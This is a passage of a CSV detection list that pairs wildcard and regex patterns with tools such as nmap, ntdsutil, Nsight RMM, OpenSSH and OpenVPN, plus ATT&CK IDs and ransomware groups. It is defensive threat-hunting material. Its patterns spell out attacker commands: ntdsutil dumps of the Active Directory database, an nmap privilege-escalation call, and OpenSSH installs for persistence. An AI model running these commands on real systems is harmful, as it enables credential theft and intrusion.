TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/nmap-nse-scripts*",".{0,1000}\/nmap\-nse\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/nmap-scada*",".{0,1000}\/nmap\-scada.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/NmapUpperCheck15*",".{0,1000}\/NmapUpperCheck15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/NmapUpperCheck16*",".{0,1000}\/NmapUpperCheck16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 
- T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/NmapUpperCheck17*",".{0,1000}\/NmapUpperCheck17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*/nmap-vulners*",".{0,1000}\/nmap\-vulners.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/nse_install/*",".{0,1000}\/nse_install\/.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/nse-install.git*",".{0,1000}\/nse\-install\.git.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - 
T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*/s4n7h0/NSE*",".{0,1000}\/s4n7h0\/NSE.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*\nmap.exe*/24*",".{0,1000}\\nmap\.exe.{0,1000}\/24.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*b4ldr/nse-scripts*",".{0,1000}b4ldr\/nse\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*external-nse-script-library*",".{0,1000}external\-nse\-script\-library.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability 
Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*ifconfig -a | grep * | xargs nmap -*",".{0,1000}ifconfig\s\-a\s\|\sgrep\s.{0,1000}\s\|\sxargs\snmap\s\-.{0,1000}","greyware_tool_keyword","nmap","Nmap Scan Every Interface that is Assigned an IP address","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","8","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*nmap -*",".{0,1000}nmap\s\-.{0,1000}","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","0","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*nmap * --script=*.nse*",".{0,1000}nmap\s.{0,1000}\s\-\-script\=.{0,1000}\.nse.{0,1000}","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://nmap.org/","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*nmap-*-setup.exe*",".{0,1000}nmap\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*nmap-elasticsearch-nse*",".{0,1000}nmap\-elasticsearch\-nse.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*nse_install.py*",".{0,1000}nse_install\.py.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*nse-insall-0.0.1*",".{0,1000}nse\-insall\-0\.0\.1.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*nse-install *",".{0,1000}nse\-install\s.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability 
Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*nse-install-master*",".{0,1000}nse\-install\-master.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*OCSAF/freevulnsearch*",".{0,1000}OCSAF\/freevulnsearch.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*os.execute(*/bin/*nmap --script=$*",".{0,1000}os\.execute\(.{0,1000}\/bin\/.{0,1000}nmap\s\-\-script\=\$.{0,1000}","greyware_tool_keyword","nmap","Nmap Privilege Escalation","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Privilege Escalation","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*psc4re/NSE-scripts*",".{0,1000}psc4re\/NSE\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" 
"*remiflavien1/nse-install*",".{0,1000}remiflavien1\/nse\-install.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*shadawck/nse-install*",".{0,1000}shadawck\/nse\-install.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*takeshixx/nmap-scripts*",".{0,1000}takeshixx\/nmap\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*zenmap.exe*",".{0,1000}zenmap\.exe.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*zmap -*",".{0,1000}zmap\s\-.{0,1000}","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable of scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability scanner","https://github.com/zmap/zmap","1","0","N/A","greyware tool - risks of False positive !","8","10","5413","907","2024-08-28T04:06:03Z","2013-01-23T01:30:09Z" "nmap *","nmap\s.{0,1000}","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","0","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z" "*fjoaledfpmneenckfbpdfhkmimnjocfa*",".{0,1000}fjoaledfpmneenckfbpdfhkmimnjocfa.{0,1000}","greyware_tool_keyword","NordVPN","External VPN browser extension usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://nordvpn.com*/ovpn/*.ovpn*",".{0,1000}https\:\/\/nordvpn\.com.{0,1000}\/ovpn\/.{0,1000}\.ovpn.{0,1000}","greyware_tool_keyword","NordVPN","OVPN configuration for nordvpn accessed within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://nordvpn.com","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* upload*.systemmonitor.eu.com*/command/agentprocessor*",".{0,1000}\supload.{0,1000}\.systemmonitor\.eu\.com.{0,1000}\/command\/agentprocessor.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Advanced Monitoring Agent\debug.log*",".{0,1000}\\Advanced\sMonitoring\sAgent\\debug\.log.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered 
Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Advanced Monitoring Agent\staging*",".{0,1000}\\Advanced\sMonitoring\sAgent\\staging.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Advanced Monitoring Agent\task_start.js*",".{0,1000}\\Advanced\sMonitoring\sAgent\\task_start\.js.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Advanced Monitoring Agent\unzip.exe*",".{0,1000}\\Advanced\sMonitoring\sAgent\\unzip\.exe.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Advanced Monitoring Agent\winagent.exe*",".{0,1000}\\Advanced\sMonitoring\sAgent\\winagent\.exe.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Advanced Monitoring Agent\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Advanced\sMonitoring\sAgent\\.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Advanced Monitoring 
Agent\*",".{0,1000}\\Program\sFiles\\Advanced\sMonitoring\sAgent\\.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\Advanced Monitoring Agent.lnk*",".{0,1000}\\Start\sMenu\\Programs\\Advanced\sMonitoring\sAgent\.lnk.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Advanced Monitoring Agent HTTP Retriever 1.1*",".{0,1000}Advanced\sMonitoring\sAgent\sHTTP\sRetriever\s1\.1.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","1","N/A","user-agent","10","10","N/A","N/A","N/A","N/A" "*\system32.zip*",".{0,1000}\\system32\.zip.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*ntdsutil *ac i ntds* *create full*\temp*",".{0,1000}ntdsutil\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}create\sfull.{0,1000}\\temp.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*ntdsutil.exe *ac i ntds* *ifm* *create 
full *c:\ProgramData*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}ifm.{0,1000}\s.{0,1000}create\sfull\s.{0,1000}c\:\\ProgramData.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*ntdsutil.exe *ac i ntds* *ifm* *create full *users\public*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}ifm.{0,1000}\s.{0,1000}create\sfull\s.{0,1000}users\\public.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*ntdsutil.exe *ac i ntds*ifm*create full *temp*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}ifm.{0,1000}create\sfull\s.{0,1000}temp.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*The database engine created a new database*temp\Active Directory\ntds.dit*",".{0,1000}The\sdatabase\sengine\screated\sa\snew\sdatabase.{0,1000}temp\\Active\sDirectory\\ntds\.dit.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False 
positive !","10","10","N/A","N/A","N/A","N/A" "*ffhhkmlgedgcliajaedapkdfigdobcif*",".{0,1000}ffhhkmlgedgcliajaedapkdfigdobcif.{0,1000}","greyware_tool_keyword","Nucleus VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*Add-WindowsCapability -Online -Name OpenSSH.Server*",".{0,1000}Add\-WindowsCapability\s\-Online\s\-Name\sOpenSSH\.Server.{0,1000}","greyware_tool_keyword","Openssh","Install OpenSSH Server service on windows - abused by attacker for persistent control","T1021.004 - T1574.001 - T1574.010","TA0003 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell#install-openssh-for-windows","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*Import-Module *\OpenSSHUtils*",".{0,1000}Import\-Module\s.{0,1000}\\OpenSSHUtils.{0,1000}","greyware_tool_keyword","Openssh","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*\\pipe\\openssh-ssh-agent*",".{0,1000}\\\\pipe\\\\openssh\-ssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","#namedpipe","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" 
"*\OpenSSHTestTasks\*",".{0,1000}\\OpenSSHTestTasks\\.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*\pipe\openssh-ssh-agent*",".{0,1000}\\pipe\\openssh\-ssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","#namedpipe","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*\Software\OpenSSH\DefaultShell*",".{0,1000}\\Software\\OpenSSH\\DefaultShell.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*install-sshd.ps1*",".{0,1000}install\-sshd\.ps1.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*net start ssh-agent*",".{0,1000}net\sstart\sssh\-agent.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered 
Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*New-Service -Name sshd*",".{0,1000}New\-Service\s\-Name\ssshd.{0,1000}","greyware_tool_keyword","openssh-portable","monitoring openssh usage","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/PowerShell/openssh-portable","1","0","N/A","N/A","10","10","1756","323","2024-08-27T20:49:50Z","2016-11-02T04:18:48Z" "*""-----BEGIN OpenVPN Static key*",".{0,1000}\""\-\-\-\-\-BEGIN\sOpenVPN\sStatic\skey.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*/openvpn.exe*",".{0,1000}\/openvpn\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","1","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\bin\tapinstall.exe*",".{0,1000}\\bin\\tapinstall\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\Licenses\OpenVPN.txt*",".{0,1000}\\Licenses\\OpenVPN\.txt.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense 
